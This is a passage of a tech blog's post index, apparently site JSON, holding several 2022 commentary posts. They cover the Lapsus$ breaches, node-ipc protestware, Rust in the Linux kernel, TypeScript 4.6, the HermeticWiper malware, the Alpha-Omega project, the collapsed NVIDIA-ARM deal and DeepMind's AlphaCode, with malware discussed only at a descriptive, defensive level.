even authenticated users can do based on context. And have a response plan for the scenario where your identity provider itself is compromised — because that scenario is no longer hypothetical.\nThis is going to be a long year for identity security.\n","date":"24 March 2022","externalUrl":null,"permalink":"/posts/220324-lapsus-group-okta-microsoft-breach/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The Lapsus$ hacking group has breached both Okta and Microsoft, exposing critical weaknesses in identity provider security and third-party access management.","title":"Lapsus$ Breaches Okta and Microsoft — The Identity Provider Nightmare","type":"posts"},{"content":"This week, the JavaScript ecosystem was hit by something I\u0026rsquo;ve never seen in my three decades of software development: a popular open source maintainer deliberately weaponizing their own package. The node-ipc library — downloaded over a million times per week and a transitive dependency of major tools like Vue CLI — was found to contain malicious code targeting users with Russian and Belarusian IP addresses.\nThe maintainer, RIAEvangelist, pushed updates that would overwrite files with heart emojis on systems geolocated to Russia or Belarus, in protest against the ongoing invasion of Ukraine. While the political sentiment may be understandable, the implications for software supply chain security are deeply troubling.\nWhat Actually Happened # The timeline is worth examining carefully. On March 7, version 11.0.0 of node-ipc was published with code that checked the user\u0026rsquo;s external IP address against geoIP databases. If the system was located in Russia or Belarus, the code would recursively traverse the filesystem and replace file contents with a heart emoji (❤️). Later versions toned this down to simply creating a file called WITH-LOVE-FROM-AMERICA.txt on the desktop.\nThe malicious code was obfuscated using base64 encoding — a deliberate attempt to hide the payload from casual code review. Versions 10.1.1 and 10.1.2 were also affected, which is particularly dangerous because they sit within a semver range that many projects would auto-update to.\nThe Snyk advisory classified this as CVE-2022-23812, and it was quickly flagged across the ecosystem. But the damage window was real — anyone running npm install or npm update on affected projects during that period could have pulled in destructive code.\nThe Supply Chain Trust Problem # I\u0026rsquo;ve written about npm supply chain issues before, and every time I think we\u0026rsquo;ve hit peak concern, something new comes along. The event-stream incident in 2018 involved a malicious actor taking over an abandoned package. The ua-parser-js hijacking last year was a compromised maintainer account. But this? This is the actual maintainer deliberately inserting destructive code into their own widely-used package.\nThat\u0026rsquo;s a fundamentally different threat model. We\u0026rsquo;ve built our entire dependency ecosystem on the assumption that maintainers act in good faith. Package signing, two-factor authentication, provenance tracking — none of these help when the threat actor has legitimate commit access and is the recognized owner of the package.\nThe Vue CLI team had to scramble to pin their node-ipc dependency to a safe version. Any project using node-ipc transitively — and there are thousands — was potentially affected. This is the tyranny of deep dependency trees that the Node.js ecosystem has always struggled with.\nWhat Can We Actually Do? # The knee-jerk reaction is to call for more vetting of open source maintainers, but that misses the point. You can\u0026rsquo;t pre-screen someone\u0026rsquo;s future political motivations or emotional state. The real solutions are structural:\nLock your dependencies. If you\u0026rsquo;re not using lockfiles (package-lock.json, yarn.lock, pnpm-lock.yaml) and committing them to version control, you\u0026rsquo;re playing Russian roulette with every install. Lockfiles won\u0026rsquo;t protect you from a compromised initial install, but they prevent silent updates from pulling in new malicious versions.\nUse npm audit and automated scanning. Tools like Snyk, Socket, and npm\u0026rsquo;s built-in audit can flag known vulnerabilities, including this one once it was cataloged. The gap between publication and detection is the danger zone.\nMinimize your dependency tree. I know this sounds like the old \u0026ldquo;just write it yourself\u0026rdquo; argument, but it\u0026rsquo;s more nuanced than that. Do you really need a library for something your platform provides natively? The Node.js standard library has grown significantly — node:fs, node:crypto, node:http2 are all mature. Every dependency you don\u0026rsquo;t take is one less trust decision.\nConsider dependency review workflows. GitHub\u0026rsquo;s dependency review action can flag new dependencies in pull requests. It won\u0026rsquo;t catch everything, but it adds a human checkpoint before new packages enter your supply chain.\nThe Ethics Question Nobody Wants to Discuss # There\u0026rsquo;s a broader conversation happening in the open source community right now about whether it\u0026rsquo;s acceptable to use your software as a form of protest or sanction. The Open Source Initiative has been clear that open source licenses are, by definition, non-discriminatory — they can\u0026rsquo;t restrict usage by geography, purpose, or person.\nBut licenses and ethics aren\u0026rsquo;t the same thing. Some developers are arguing that maintainers have the right — maybe even the obligation — to use whatever leverage they have against what they see as injustice. Others, myself included, worry about the precedent. If we accept supply chain sabotage as legitimate protest, we\u0026rsquo;ve opened a door that can\u0026rsquo;t be closed. Who decides which causes justify weaponizing code? What happens when someone with a less universally sympathized-with cause does the same thing?\nMy Take # I have enormous sympathy for anyone affected by the war in Ukraine, and I understand the impulse to use whatever tools you have at your disposal. But as someone who has spent decades building systems that depend on trust in the software supply chain, I can\u0026rsquo;t endorse this approach.\nThe node-ipc incident didn\u0026rsquo;t just affect Russian systems — it affected the trust model of the entire npm ecosystem. It gave every CISO and procurement officer another reason to be wary of open source dependencies. And it made the already thankless job of open source maintenance even harder for everyone else.\nWhat I want to see come out of this is not more finger-pointing, but better tooling. We need reproducible builds, better provenance tracking, and runtime sandboxing for dependencies. Deno\u0026rsquo;s permission model is looking more prescient by the day — imagine if node-ipc had to explicitly request filesystem write access.\nThe open source ecosystem is one of the great achievements of our industry. Let\u0026rsquo;s not let it become a battlefield.\n","date":"17 March 2022","externalUrl":null,"permalink":"/posts/220317-node-ipc-protestware-supply-chain/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A popular npm package was deliberately sabotaged by its own maintainer, raising urgent questions about supply chain trust in open source.","title":"The node-ipc Protestware Incident — When Open Source Becomes a Weapon","type":"posts"},{"content":"The Rust for Linux project has been quietly building momentum, and the latest patch series submitted to the Linux Kernel Mailing List (LKML) makes it clear this isn\u0026rsquo;t going away. Miguel Ojeda and the team have been steadily addressing reviewer feedback, improving the integration points between Rust and the kernel\u0026rsquo;s C infrastructure, and demonstrating that memory-safe systems programming in the kernel isn\u0026rsquo;t just theoretically possible — it\u0026rsquo;s practically achievable.\nWhy the Kernel Needs Rust # Let\u0026rsquo;s start with the fundamental motivation. A significant percentage of kernel vulnerabilities — Google\u0026rsquo;s security team has consistently cited around 70% — stem from memory safety issues. Buffer overflows, use-after-free bugs, null pointer dereferences, data races. These are the classes of bugs that Rust\u0026rsquo;s ownership model and borrow checker are specifically designed to prevent at compile time.\nThe Linux kernel is roughly 30 million lines of C code, maintained by thousands of developers with varying levels of experience. The evolution of Rust adoption shows how this trend accelerated. Even the best C programmers make memory safety mistakes — the cognitive overhead of manual memory management in complex concurrent code is enormous. I\u0026rsquo;ve written my share of C over the decades, and I\u0026rsquo;ll be the first to admit that the language makes it far too easy to introduce subtle memory bugs that might not manifest until years later under specific conditions.\nRust doesn\u0026rsquo;t eliminate all bugs, but it eliminates entire categories of them. In a codebase as critical as the Linux kernel, that\u0026rsquo;s transformational.\nHow the Integration Works # The Rust for Linux approach is pragmatic and well-designed. Nobody is proposing rewriting the kernel in Rust — that would be absurd for a 30-year-old codebase. Instead, the project enables writing new kernel modules and drivers in Rust, with safe abstractions over the existing C kernel APIs.\nThe architecture uses a layered approach. At the bottom, unsafe Rust bindings interact directly with kernel C functions through bindgen-generated interfaces. On top of those, safe Rust abstractions provide idiomatic APIs that kernel developers can use without writing unsafe code. A new driver author can work entirely in safe Rust while the underlying bindings handle the C interop.\nThis is the right approach. You get the safety benefits for new code without the impossible task of rewriting existing subsystems. Later kernel releases showcased continued Rust integration. Over time, as drivers are updated or new ones written, the proportion of memory-safe code in the kernel naturally increases.\nThe toolchain integration has also matured significantly. The project uses a specific version of the Rust compiler (currently targeting nightly, with plans to move to stable releases once certain features are stabilized), and the build system integration with Kbuild is surprisingly clean. You can configure which Rust support to enable alongside your normal kernel configuration.\nThe Cultural Shift # Perhaps more interesting than the technical work is the cultural shift happening within the kernel community. Linus Torvalds has expressed openness to merging Rust support, which is a significant signal. The kernel community is famously conservative — and for good reason, given the stability requirements — but there\u0026rsquo;s growing recognition that the status quo on memory safety isn\u0026rsquo;t sustainable.\nNot everyone is on board, of course. Some veteran kernel developers have expressed concerns about adding a second language to the kernel, the learning curve for maintainers, and the complexity of debugging across language boundaries. These are legitimate concerns. Maintaining a mixed C/Rust codebase requires developers who understand both languages and the interaction between them.\nBut I think the trajectory is clear. The industry is moving toward memory-safe systems programming languages, and the kernel can either lead that transition or be dragged into it. The QUIC protocol adoption demonstrates how new protocols benefit from memory-safe implementations. Android has already committed to Rust for new platform code, and Microsoft has been experimenting with Rust in Windows components. The major OS vendors are converging on the same conclusion.\nWhat This Means for Developers # Even if you never write kernel code, the Rust-in-Linux effort matters for a few reasons.\nFirst, it validates Rust as a systems programming language for the most demanding environment possible. If Rust is good enough for the Linux kernel, it\u0026rsquo;s good enough for your systems work.\nSecond, the abstractions being developed for kernel use are pushing Rust\u0026rsquo;s type system and unsafe code patterns into new territory. The techniques being pioneered here — safe wrappers over C APIs, compile-time resource management for hardware interactions, zero-cost abstractions for kernel primitives — will eventually benefit the broader Rust ecosystem.\nThird, and most practically, a kernel with more memory-safe code means fewer kernel vulnerabilities, fewer CVEs, fewer emergency patches, and more stable systems for everyone running Linux. That\u0026rsquo;s every cloud server, every Android phone, every embedded device, every container in your Kubernetes cluster.\nMy Take # I\u0026rsquo;ve watched programming language debates come and go. Usually they\u0026rsquo;re about developer productivity or ecosystem size or syntax preferences. The Rust conversation is fundamentally different because it\u0026rsquo;s about correctness — specifically, the kind of correctness that prevents security vulnerabilities and system crashes.\nThe Rust for Linux project represents something I find genuinely exciting: a pragmatic, incremental path to meaningfully improving the security and stability of the most important software on the planet. It\u0026rsquo;s not revolutionary in its approach — it\u0026rsquo;s evolutionary, which is exactly what makes it likely to succeed.\nI\u0026rsquo;ve been writing more Rust in my own work over the past year, primarily for CLI tools and service components where performance and reliability matter. The learning curve is real, but the compiler\u0026rsquo;s guarantees fundamentally change how I think about code correctness. Seeing those same guarantees heading into the kernel feels like the beginning of a long-overdue shift.\nIf you\u0026rsquo;re a systems programmer who hasn\u0026rsquo;t tried Rust yet, the kernel project is another strong signal that now is the time. The language, tooling, and ecosystem have matured enough that the investment pays dividends. Start with something small — a CLI tool, a data processing pipeline — and let the borrow checker teach you a new way of thinking about memory and ownership. Your future self will thank you.\n","date":"10 March 2022","externalUrl":null,"permalink":"/posts/220310-rust-linux-kernel-progress/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The Rust for Linux project continues gaining momentum with updated patch series and growing support from kernel maintainers. Memory safety in the kernel is getting real.","title":"Rust in the Linux Kernel — From Experiment to Inevitability","type":"posts"},{"content":"TypeScript 4.6 landed this week, and while it\u0026rsquo;s not a headline-grabbing release, it\u0026rsquo;s one of those updates that makes day-to-day development genuinely smoother. The TypeScript team continues their steady cadence of releases that chip away at the rough edges of the type system, and this one includes several improvements I\u0026rsquo;ve been wanting for a while. This follows the trajectory from TypeScript 4.1\u0026rsquo;s template literal types toward increasingly sophisticated type safety. You can read the full announcement on the TypeScript blog.\nControl Flow Analysis Improvements # The biggest quality-of-life improvement in 4.6 is better control flow analysis for destructured discriminated unions. If that sounds academic, let me show you why it matters.\nPreviously, TypeScript could narrow types based on discriminant properties when you accessed them directly on an object, but it lost track of the relationship once you destructured. So if you had a discriminated union like { kind: \u0026quot;success\u0026quot;, data: string } | { kind: \u0026quot;error\u0026quot;, message: string } and you destructured kind and data/message, the compiler couldn\u0026rsquo;t connect the check on kind to the narrowing of the other fields. This pattern is fundamental to modern TypeScript code.\nIn 4.6, this just works. You can destructure, check the discriminant, and TypeScript correctly narrows the other variables. This is huge for patterns that are common in Redux reducers, API response handlers, and event processing — basically anywhere you\u0026rsquo;re pattern-matching on tagged unions.\nI refactored a middleware layer in a project this morning to take advantage of this, removing about 30 type assertions that were previously necessary to make the compiler happy. The code is cleaner, and more importantly, those type assertions were hiding potential bugs. Letting the compiler do proper narrowing means it can actually catch mistakes.\nIndexed Access Inference Improvements # TypeScript 4.6 also improves inference for indexed access types. When you write generic functions that index into objects using type parameters, the compiler is now smarter about inferring the relationship between the key and the resulting value type.\nThis matters for utility functions — the kind of type-safe get and set helpers that every large codebase eventually needs. Previously, you\u0026rsquo;d often have to add explicit type annotations or use intermediate type assertions to guide the compiler. Now, more of these patterns \u0026ldquo;just work\u0026rdquo; with inference alone.\nFor library authors, this is particularly welcome. If you maintain typed APIs or ORM layers, you\u0026rsquo;ve probably fought with indexed access inference before. Less fighting with the type system means more time solving actual problems. The trend of incremental type safety improvements continues to make TypeScript more practical for real-world development.\nSyntax Checking in JavaScript Files # A smaller but appreciated change: TypeScript now reports syntax errors in JavaScript files. If you\u0026rsquo;re using checkJs or // @ts-check comments (and you should be — it\u0026rsquo;s one of the easiest ways to add type safety incrementally), the compiler will now catch basic syntax errors that previously slipped through.\nThis fills a gap that always felt odd. You\u0026rsquo;d enable JavaScript checking, get great type errors, but miss a stray comma or bracket that would blow up at runtime. Now the tooling is more consistent.\nPerformance: trace and generateTrace # For large projects, TypeScript 4.6 introduces a --generateTrace flag that produces detailed performance traces you can load in Chrome DevTools\u0026rsquo; performance panel or perfetto. If you\u0026rsquo;ve ever wondered why your TypeScript compilation takes 45 seconds, this is how you find out.\nI ran this against one of our larger monorepo projects (roughly 800 TypeScript files) and immediately identified a few type definitions that were causing the compiler to spend disproportionate time on type instantiation. One overly-complex mapped type was responsible for about 15% of total compile time. Simplifying it cut our incremental build from 12 seconds to under 9 seconds. That kind of improvement compounds across a team of developers rebuilding dozens of times per day.\nES Module Support in Node.js # TypeScript 4.6 also improves support for ES modules in Node.js through the node12 and nodenext module resolution modes that were introduced in 4.5. While this is still somewhat experimental, it\u0026rsquo;s getting more stable with each release. The ecosystem is slowly but surely moving toward native ES modules in Node.js, and TypeScript needs to keep pace.\nIf you haven\u0026rsquo;t started thinking about your ESM migration strategy, now\u0026rsquo;s a good time. The Node.js ecosystem\u0026rsquo;s transition from CommonJS to ES modules is happening, and it\u0026rsquo;s going to touch every project eventually. TypeScript\u0026rsquo;s improving support makes the migration path clearer.\nMy Take # TypeScript releases rarely make front-page news, but they consistently make my working life better. Version 4.6 is a perfect example of the TypeScript team\u0026rsquo;s approach: no dramatic breaking changes, just steady improvements to type inference, performance tooling, and developer experience.\nThe control flow analysis improvement for destructured unions is my favorite feature in this release. It removes a class of type assertions that always felt like working around the compiler rather than with it. Every removed as cast is a potential bug the compiler can now catch.\nIf you\u0026rsquo;re on a recent 4.x version, the upgrade should be smooth. Run your test suite, check your CI, and enjoy slightly smarter type checking. That\u0026rsquo;s the TypeScript way — boring in the best possible sense.\nFor teams still evaluating TypeScript adoption, the language has never been more mature. The type system is expressive enough to model complex domain logic, the tooling is excellent, and the incremental adoption story (via checkJs and gradual strictness) means you don\u0026rsquo;t have to rewrite your project to get value. If you\u0026rsquo;re writing Node.js or frontend code without TypeScript in 2022, you\u0026rsquo;re leaving safety and productivity on the table.\n","date":"3 March 2022","externalUrl":null,"permalink":"/posts/220303-typescript-4-6-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"TypeScript 4.6 brings improved control flow analysis, better type narrowing for destructured discriminated unions, and performance improvements that matter for large codebases.","title":"TypeScript 4.6 Drops — Smarter Type Narrowing and Real-World Wins","type":"posts"},{"content":"Today is a dark day. Russia has launched a military invasion of Ukraine, and alongside the physical assault, we\u0026rsquo;re witnessing one of the most significant cyber operations ever deployed in conjunction with conventional warfare. Security researchers at ESET and Symantec have identified a new destructive malware dubbed \u0026ldquo;HermeticWiper\u0026rdquo; that has been deployed against Ukrainian organizations. This isn\u0026rsquo;t ransomware looking for a payout — it\u0026rsquo;s pure destruction, designed to render systems unbootable.\nWhat HermeticWiper Does # The technical details emerging from ESET\u0026rsquo;s analysis paint a picture of deliberate, targeted destruction. HermeticWiper abuses legitimate drivers from the EaseUS Partition Master software to gain low-level disk access, then systematically corrupts the Master Boot Record (MBR) and partition tables. It targets the first 512 bytes of every physical drive, effectively destroying the system\u0026rsquo;s ability to boot.\nWhat\u0026rsquo;s particularly noteworthy is the compilation timestamp on the malware samples: December 28, 2021. This suggests the operation was planned months in advance, well before the diplomatic situation reached its current crisis point. The certificate used to sign the malware was issued to a Cypriot company called \u0026ldquo;Hermetica Digital Ltd\u0026rdquo; — hence the name — and appears to have been obtained specifically for this purpose.\nThis isn\u0026rsquo;t a vulnerability exploit or a clever zero-day. It\u0026rsquo;s a brute-force destructive tool, and its effectiveness comes from the coordinated timing of its deployment, not from technical sophistication.\nThe Broader Cyber Campaign # HermeticWiper didn\u0026rsquo;t arrive in isolation. Over the past weeks, Ukrainian government websites were defaced and taken offline in DDoS attacks. A separate piece of malware called WhisperGate was discovered targeting Ukrainian systems back in January, using a similar wiper approach disguised as ransomware. Microsoft\u0026rsquo;s Threat Intelligence Center documented that campaign in mid-January.\nWhat we\u0026rsquo;re seeing is the operational integration of cyber capabilities with conventional military operations. DDoS attacks to disrupt communications, wiper malware to destroy data and systems, phishing campaigns against government officials — all synchronized with physical military movements. This is what cyber warfare theorists have been warning about for years, and it\u0026rsquo;s now playing out in real time.\nImplications for the Rest of Us # If you\u0026rsquo;re not operating in Ukraine, you might be tempted to think this doesn\u0026rsquo;t affect you. I\u0026rsquo;d push back on that. Hard.\nFirst, there\u0026rsquo;s the direct risk of spillover. NotPetya in 2017 was deployed as a targeted attack against Ukrainian tax software but ended up causing over $10 billion in damages worldwide, hitting Maersk, FedEx, Merck, and countless others. Destructive malware doesn\u0026rsquo;t respect borders or IP address ranges. CISA has issued a \u0026ldquo;Shields Up\u0026rdquo; advisory urging all organizations to adopt a heightened cybersecurity posture.\nSecond, the tactics being used here will be studied, refined, and replicated by threat actors worldwide. The playbook of combining wipers with legitimate signed drivers to bypass security tools is now public knowledge. Expect to see variations of this approach in criminal malware within months.\nThird, this situation highlights the absolute criticality of offline backups and disaster recovery plans. Wiper malware doesn\u0026rsquo;t give you a negotiation option. There\u0026rsquo;s no decryption key to buy. Your data is gone, your systems are bricked, and your recovery time is measured by how good your backup strategy is.\nPractical Steps for Defense # I\u0026rsquo;ve spent this morning reviewing our own security posture, and here\u0026rsquo;s what I\u0026rsquo;d recommend every team prioritize:\nBackup verification: Not \u0026ldquo;do you have backups\u0026rdquo; but \u0026ldquo;have you tested a full restore this quarter?\u0026rdquo; Offline, air-gapped backups are your last line of defense against wipers.\nNetwork segmentation: If wiper malware gets into one system, can it reach your entire infrastructure? Flat networks are wiper playgrounds.\nEndpoint detection: Ensure your EDR solutions are updated. The security community is actively sharing indicators of compromise (IOCs) for HermeticWiper — make sure your tools can detect them.\nPatch aggressively: This is always good advice, but right now it\u0026rsquo;s critical. Known vulnerabilities are the easiest path in, and state-sponsored actors have deep catalogs of exploits.\nMonitor for anomalies: Unusual authentication patterns, unexpected administrative tool usage, large-scale file modifications — these are the signals that precede a wiper deployment.\nMy Take # I\u0026rsquo;ve been working in tech for three decades, and I\u0026rsquo;ve watched cybersecurity evolve from an afterthought to a boardroom concern. But watching malware deployed in coordination with missiles and tanks hits different. This isn\u0026rsquo;t a theoretical exercise anymore.\nFor those of us who build and maintain systems, today is a reminder that security isn\u0026rsquo;t a feature — it\u0026rsquo;s a fundamental responsibility. The systems we build, the data we steward, the infrastructure we operate — these things matter to real people. When those systems are destroyed, real consequences follow.\nMy thoughts are with the people of Ukraine today. For the rest of us, the best thing we can do professionally is take the CISA Shields Up guidance seriously and make sure our own houses are in order. The threat landscape just changed permanently.\n","date":"24 February 2022","externalUrl":null,"permalink":"/posts/220224-hermeticwiper-ukraine-cyber-warfare/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"As conflict erupts in Ukraine, destructive wiper malware targeting critical infrastructure signals a new chapter in state-sponsored cyber operations.","title":"HermeticWiper and the New Reality of Cyber Warfare","type":"posts"},{"content":"The open source security story has been building for a while now. After the Log4Shell vulnerability shook the industry in December, everyone has been asking the same question: how do we prevent this from happening again? This week, the Linux Foundation and the Open Source Security Foundation (OpenSSF) announced the Alpha-Omega Project, backed with $5 million in initial funding from Google and Microsoft. It\u0026rsquo;s one of the most concrete answers we\u0026rsquo;ve seen yet.\nWhat Alpha-Omega Actually Does # The name describes the approach neatly. The \u0026ldquo;Alpha\u0026rdquo; part focuses on the most critical open source projects — the ones that, like Log4j, underpin vast swaths of the internet\u0026rsquo;s infrastructure. These projects get dedicated security experts assigned to work directly with maintainers on vulnerability identification, code audits, and security hardening. Think of it as embedding security engineers into the projects that matter most.\nThe \u0026ldquo;Omega\u0026rdquo; part takes a broader approach, targeting at least 10,000 widely-deployed open source projects with automated security analysis, fuzzing, and tooling. This is where scale comes in — you can\u0026rsquo;t hand-audit every npm package or Python library that sits in critical dependency chains, but you can run automated tools against them systematically.\nIt\u0026rsquo;s a smart two-pronged strategy. You address the known critical infrastructure with focused human expertise, and you cast a wide net over the long tail with automation.\nWhy This Matters Now # If you\u0026rsquo;ve been in this industry long enough, you\u0026rsquo;ve seen the \u0026ldquo;open source sustainability\u0026rdquo; conversation come and go in waves. What\u0026rsquo;s different this time is that the conversation has shifted from sustainability to security, and the money is following.\nThe Log4Shell incident was a wake-up call, but it wasn\u0026rsquo;t the first alarm. The SolarWinds supply chain attack in 2020 demonstrated how compromised build processes could cascade through organizations. The Codecov breach last year showed supply chain attacks hitting developer tooling directly. And the ongoing dependency confusion research has highlighted how easy it is to inject malicious packages into build pipelines.\nWhat ties these together is a fundamental truth: modern software is built on layers of open source dependencies, and the security of those dependencies is only as strong as the maintainers who support them. Many critical projects are maintained by one or two people in their spare time. That\u0026rsquo;s not a criticism — it\u0026rsquo;s a structural problem that requires structural solutions.\nThe Funding Question # Five million dollars is a start, but let\u0026rsquo;s be honest: it\u0026rsquo;s a rounding error for Google and Microsoft. The real question is whether this signals a sustained commitment or a PR response to Log4Shell pressure.\nI\u0026rsquo;m cautiously optimistic. The OpenSSF has been building infrastructure for this kind of work for a while now. Projects like Sigstore for artifact signing, SLSA for supply chain integrity, and Scorecard for automated security assessment are all coming together into something that looks like a coherent strategy. Alpha-Omega adds the human element that pure tooling can\u0026rsquo;t replace.\nWhat I\u0026rsquo;d like to see next is direct engagement with package registries — npm, PyPI, crates.io, Maven Central. These are the distribution points where security interventions have the highest leverage. If every package published to npm had automated security scanning as part of the publish pipeline, we\u0026rsquo;d catch a meaningful percentage of problems before they reach anyone\u0026rsquo;s node_modules.\nWhat You Can Do Today # While waiting for the industry to sort itself out, there are practical steps every development team should be taking right now. Lock your dependency versions. Use tools like npm audit, pip-audit, or cargo audit in your CI pipelines. Set up Dependabot or Renovate for automated dependency updates. Review your SBOM (Software Bill of Materials) — if you don\u0026rsquo;t have one, that\u0026rsquo;s your first action item.\nI\u0026rsquo;ve been running npm audit in CI for years, failing builds on high-severity vulnerabilities. It\u0026rsquo;s a blunt instrument, but it catches things. More recently, I\u0026rsquo;ve started integrating Snyk into our pipeline for deeper analysis. The tooling has gotten significantly better even in the last year.\nMy Take # The Alpha-Omega Project represents something I\u0026rsquo;ve been wanting to see for over a decade: major tech companies putting real resources behind the open source infrastructure they depend on. Not just sponsoring conferences or buying laptops for maintainers, but funding systematic security work.\nIs it enough? No. But it\u0026rsquo;s a meaningful step in the right direction, and it comes with the institutional backing of the Linux Foundation and OpenSSF, which gives it a better chance of lasting beyond the current news cycle.\nThe security of our software supply chain is everyone\u0026rsquo;s problem. If you\u0026rsquo;re a developer reading this, take an hour this week to audit your project\u0026rsquo;s dependencies. You might be surprised what you find.\n","date":"17 February 2022","externalUrl":null,"permalink":"/posts/220217-alpha-omega-open-source-security/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The Linux Foundation’s new Alpha-Omega Project, backed by Google and Microsoft, aims to systematically improve the security of critical open source software.","title":"Alpha-Omega Project — The Linux Foundation Gets Serious About Open Source Security","type":"posts"},{"content":"After more than a year of regulatory scrutiny spanning the US, EU, UK, and China, NVIDIA has officially abandoned its $40 billion acquisition of ARM Holdings. The deal, first announced in September 2020, would have been the largest semiconductor acquisition in history. Instead, SoftBank — ARM\u0026rsquo;s current owner — is now preparing ARM for an IPO. For those of us who build software that ultimately runs on these chips, this outcome matters more than you might think.\nWhy Regulators Said No # The opposition was broad and unusually unified. The FTC filed an antitrust lawsuit in December, the UK\u0026rsquo;s Competition and Markets Authority raised serious concerns, and the EU had opened a formal investigation. The core worry was straightforward: NVIDIA, a major chip designer, would gain control over ARM\u0026rsquo;s architecture that powers virtually every smartphone on the planet and an increasing share of server workloads.\nARM\u0026rsquo;s business model depends on being a neutral licensor. Companies like Qualcomm, Apple, Samsung, Amazon, and yes, even NVIDIA itself, all license ARM designs. Handing that neutral platform to one of its biggest licensees struck regulators as a recipe for competitive harm. Qualcomm and other ARM licensees had been lobbying hard against the deal, and it\u0026rsquo;s hard to blame them.\nThe Developer Angle # If you\u0026rsquo;re wondering why a chip deal matters to software engineers, consider how much the ARM ecosystem has expanded in the last two years. Apple\u0026rsquo;s M1 chips have proven that ARM can compete at the high end of desktop and laptop computing. AWS Graviton processors are handling production workloads at scale, often at better price-performance ratios than their x86 counterparts. Microsoft is pushing ARM-based Windows development forward.\nHad NVIDIA acquired ARM, there was a real risk that this ecosystem could have fractured. Would Apple have continued investing as heavily in ARM if a direct competitor owned the instruction set architecture? Would AWS have felt comfortable building Graviton4 on an architecture controlled by a company that also sells cloud GPU instances? These aren\u0026rsquo;t hypothetical concerns — they\u0026rsquo;re the exact scenarios that kept regulators up at night.\nAs developers, we benefit enormously from a competitive ARM ecosystem. Cross-compilation targets, CI/CD pipelines that build for ARM, container images optimized for Graviton — all of this thrives when the underlying architecture remains openly licensed and vendor-neutral.\nARM\u0026rsquo;s Path Forward # SoftBank\u0026rsquo;s plan to take ARM public is arguably the best outcome for the broader tech ecosystem. An independent ARM, accountable to public shareholders and a diverse customer base, has every incentive to keep innovating without playing favorites. The company has been investing in ARMv9, which brings significant improvements to security, vector processing, and machine learning workloads.\nI\u0026rsquo;m particularly watching the server space. ARM-based instances are becoming my default recommendation for new cloud deployments where the workload allows it. The price-performance advantage on AWS Graviton2 and Graviton3 instances is real and measurable — I\u0026rsquo;ve seen 20-30% cost reductions on Node.js and Python workloads just by switching instance families.\nMy Take # Honestly, I\u0026rsquo;m relieved. I\u0026rsquo;ve been building software on ARM-based systems since the early days of Raspberry Pi tinkering, and I\u0026rsquo;ve watched the architecture grow from \u0026ldquo;that thing in phones\u0026rdquo; to a legitimate force in every computing segment. That growth happened precisely because ARM operated as a neutral, widely-licensed platform.\nNVIDIA is an extraordinary company — their GPU ecosystem and CUDA platform are unmatched — but concentrating ARM\u0026rsquo;s architecture under their roof would have been a step backward for the industry. Sometimes the most pro-innovation outcome is preventing consolidation rather than enabling it.\nThe next chapter for ARM as an independent, publicly traded company could be its most interesting yet. With the architecture showing up in everything from edge IoT devices to hyperscale data centers, the neutral licensing model has never been more valuable. I\u0026rsquo;ll be watching the IPO with genuine interest — not as an investment tip, but as a signal for where the compute landscape is heading.\nFor now, I\u0026rsquo;m going back to optimizing some container builds for multi-arch deployment. ARM and x86 side by side, as it should be.\n","date":"10 February 2022","externalUrl":null,"permalink":"/posts/220210-nvidia-arm-deal-collapse/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"NVIDIA’s $40 billion bid for ARM has officially fallen apart under regulatory pressure, and the implications for the semiconductor landscape are enormous.","title":"NVIDIA-ARM Deal Collapses — What It Means for the Chip Industry","type":"posts"},{"content":"DeepMind published a preprint paper this week introducing AlphaCode, an AI system that can compete at a roughly average human level in programming competitions on Codeforces. The system was evaluated on recent contests (to avoid data leakage from training) and placed within the top 54% of participants — roughly the level of a competent competitive programmer.\nThis is a different kind of achievement than what we\u0026rsquo;ve seen from GitHub Copilot or other code completion tools. AlphaCode isn\u0026rsquo;t autocompleting lines of code — it\u0026rsquo;s reading problem descriptions in natural language, reasoning about algorithms, and generating complete solutions. That\u0026rsquo;s a qualitatively different capability, and it\u0026rsquo;s worth understanding what it does and doesn\u0026rsquo;t mean.\nHow AlphaCode Works # The technical approach is both impressive and revealing. AlphaCode uses a large transformer model (similar in architecture to GPT-3) trained on a massive corpus of code from GitHub. But the interesting part is what happens at inference time.\nFor each problem, AlphaCode generates up to a million candidate solutions. Yes, a million. It then uses a clustering and filtering pipeline to narrow these down to roughly 10 submissions, which are evaluated against the contest\u0026rsquo;s test cases. The system essentially brute-forces the solution space with massive sampling, then uses learned heuristics to pick the best candidates.\nThis is fundamentally different from how a human competitive programmer works. A skilled human reads the problem, identifies the algorithmic approach (dynamic programming, graph traversal, greedy, etc.), and writes one or maybe two solutions. AlphaCode compensates for weaker \u0026ldquo;understanding\u0026rdquo; with overwhelming generation capacity.\nThe filtering pipeline is doing heavy lifting here. AlphaCode clusters candidate solutions by their behavior on generated test inputs, then selects diverse representatives from each cluster. Later AI coding systems improved on this brute-force approach significantly. This ensures that the 10 submitted solutions cover different algorithmic approaches rather than being 10 minor variations of the same idea.\nWhat This Tells Us About AI and Programming # The results are impressive in absolute terms — placing in the top half of Codeforces participants is no trivial achievement. But several aspects of the system\u0026rsquo;s design reveal the current limitations:\nThe million-sample approach is a brute force workaround. If the model truly \u0026ldquo;understood\u0026rdquo; the problems, it wouldn\u0026rsquo;t need to generate a million candidates and filter down. The massive overgeneration suggests that the model is pattern-matching against its training data rather than reasoning from first principles. This works for competitive programming, where the solution space is constrained and automatically verifiable, but it doesn\u0026rsquo;t translate to real-world software engineering.\nCompetitive programming is unusually well-suited to AI. Problems are precisely specified, have clear input/output formats, come with test cases for verification, and can be solved in relatively short self-contained programs. Real software engineering involves ambiguous requirements, complex system interactions, ongoing maintenance, and communication with stakeholders. These are areas where current AI systems are much weaker.\nThe evaluation metric is forgiving. Getting 10 submissions per problem is generous — human contestants typically get one or two. And the \u0026ldquo;top 54%\u0026rdquo; ranking, while respectable, means AlphaCode is performing at a median level on what are, by programming standards, relatively well-defined problems.\nThe GitHub Copilot Comparison # I\u0026rsquo;ve been using GitHub Copilot in my daily development for several months now, and AlphaCode highlights the difference between code generation at different scales of complexity. Copilot\u0026rsquo;s evolution showed how much progress was possible.\nCopilot excels at the micro-level: completing functions, suggesting boilerplate, and occasionally producing surprisingly apt implementations of 